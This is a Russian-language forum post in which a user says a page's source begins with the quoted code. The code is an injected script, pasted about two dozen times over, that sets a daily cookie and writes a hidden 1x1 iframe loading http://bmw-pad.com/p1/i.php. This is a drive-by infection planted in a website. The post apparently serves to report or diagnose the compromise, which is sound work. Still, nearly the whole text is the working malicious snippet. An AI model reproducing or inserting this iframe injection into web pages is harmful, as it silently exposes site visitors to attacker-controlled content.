|
|
Yabuti V.I.P. |
Зарегистрирован: 28.11.2008
Сообщений: 16263
|
Обратиться по нику
|
Yabuti |
Ответить с цитатой | | |
|
В начале сорцев страницы стоит такой код:
Код: |
[size=7]<SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
var sn="gutji77";
if (Get_Cookie(sn) == null)
{
Set_Cookie(sn, '76', 60*60*24);
document.write("<iframe src='http://bmw-pad.com/p1/i.php?user=admin' width=1 height=1 style='display:none'></iframe>");
}
</SCRIPT><SCRIPT>
function Set_Cookie( name, value, expiresSeconds )
{
var today = new Date();
today.setTime( today.getTime() );
if ( expiresSeconds )
{
expires = expiresSeconds * 1000;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" );
}
function Get_Cookie( check_name ) {
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == check_name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
}
